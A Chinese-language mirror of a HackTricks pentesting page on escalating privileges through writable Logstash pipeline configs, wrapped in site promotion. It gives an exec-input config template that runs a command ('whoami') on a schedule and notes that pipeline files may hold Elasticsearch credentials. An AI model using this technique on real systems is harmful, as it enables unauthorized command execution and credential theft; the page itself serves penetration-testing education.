mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-27 07:01:09 +00:00
4.8 KiB
4.8 KiB
从零到英雄学习AWS黑客攻击,通过 htARTE (HackTricks AWS红队专家)!
支持HackTricks的其他方式:
- 如果您想在HackTricks中看到您的公司广告或下载HackTricks的PDF,请查看订阅计划!
- 获取官方PEASS & HackTricks商品
- 发现PEASS家族,我们独家的NFTs系列
- 加入 💬 Discord群组或telegram群组或在Twitter 🐦 上关注我 @carlospolopm。
- 通过向 HackTricks 和 HackTricks Cloud github仓库提交PR来分享您的黑客技巧。
基本信息
Logstash 用于收集、转换和输出日志。这是通过使用管道实现的,它包含输入、过滤和输出模块。当攻破运行Logstash服务的机器时,该服务变得很有趣。
管道
管道配置文件 /etc/logstash/pipelines.yml 指定了活动管道的位置:
# This file is where you define your pipelines. You can define multiple.
# For more information on multiple pipelines, see the documentation:
# https://www.elastic.co/guide/en/logstash/current/multiple-pipelines.html
- pipeline.id: main
path.config: "/etc/logstash/conf.d/*.conf"
- pipeline.id: example
path.config: "/usr/share/logstash/pipeline/1*.conf"
pipeline.workers: 6
在这里,你可以找到指向 .conf 文件的路径,这些文件包含配置好的管道。如果使用了 Elasticsearch 输出模块,管道很可能会包含对某个 Elasticsearch 实例的有效凭证。这些凭证通常拥有更多权限,因为 Logstash 需要向 Elasticsearch 写入数据。如果使用了通配符,Logstash 会尝试运行匹配该通配符的文件夹中的所有管道。
通过可写管道提升权限
在尝试提升自己的权限之前,你应该检查运行 logstash 服务的用户是谁,因为这将是你之后将要控制的用户。默认情况下,logstash 服务以 logstash 用户的权限运行。
检查你是否拥有以下所需的权限之一:
- 你对某个管道的 .conf 文件拥有写权限,或者
- /etc/logstash/pipelines.yml 包含一个通配符,并且你被允许写入指定的文件夹
此外,必须满足以下条件之一:
- 你能够重启 logstash 服务,或者
- /etc/logstash/logstash.yml 包含条目 config.reload.automatic: true
如果指定了通配符,尝试创建一个匹配该通配符的文件。可以将以下内容写入文件以执行命令:
input {
exec {
command => "whoami"
interval => 120
}
}
output {
file {
path => "/tmp/output.log"
codec => rubydebug
}
}
间隔指定时间(秒)。在此示例中,每120秒执行一次whoami命令。命令的输出保存在**/tmp/output.log**中。
如果**/etc/logstash/logstash.yml包含条目config.reload.automatic: true**,你只需等待命令执行,因为Logstash会自动识别新的管道配置文件或现有管道配置的任何更改。否则,触发重启logstash服务。
如果没有使用通配符,你可以将这些更改应用于现有的管道配置。确保你不要弄坏东西!
参考资料
从零开始学习AWS黑客攻击直到成为专家,通过 htARTE (HackTricks AWS Red Team Expert)!
支持HackTricks的其他方式:
- 如果你想在HackTricks中看到你的公司广告或下载HackTricks的PDF,请查看订阅计划!
- 获取官方PEASS & HackTricks商品
- 发现PEASS家族,我们独家的NFTs系列
- 加入 💬 Discord群组 或 telegram群组 或在 Twitter 🐦 上关注我 @carlospolopm。
- 通过向 HackTricks 和 HackTricks Cloud github仓库提交PR来分享你的黑客技巧。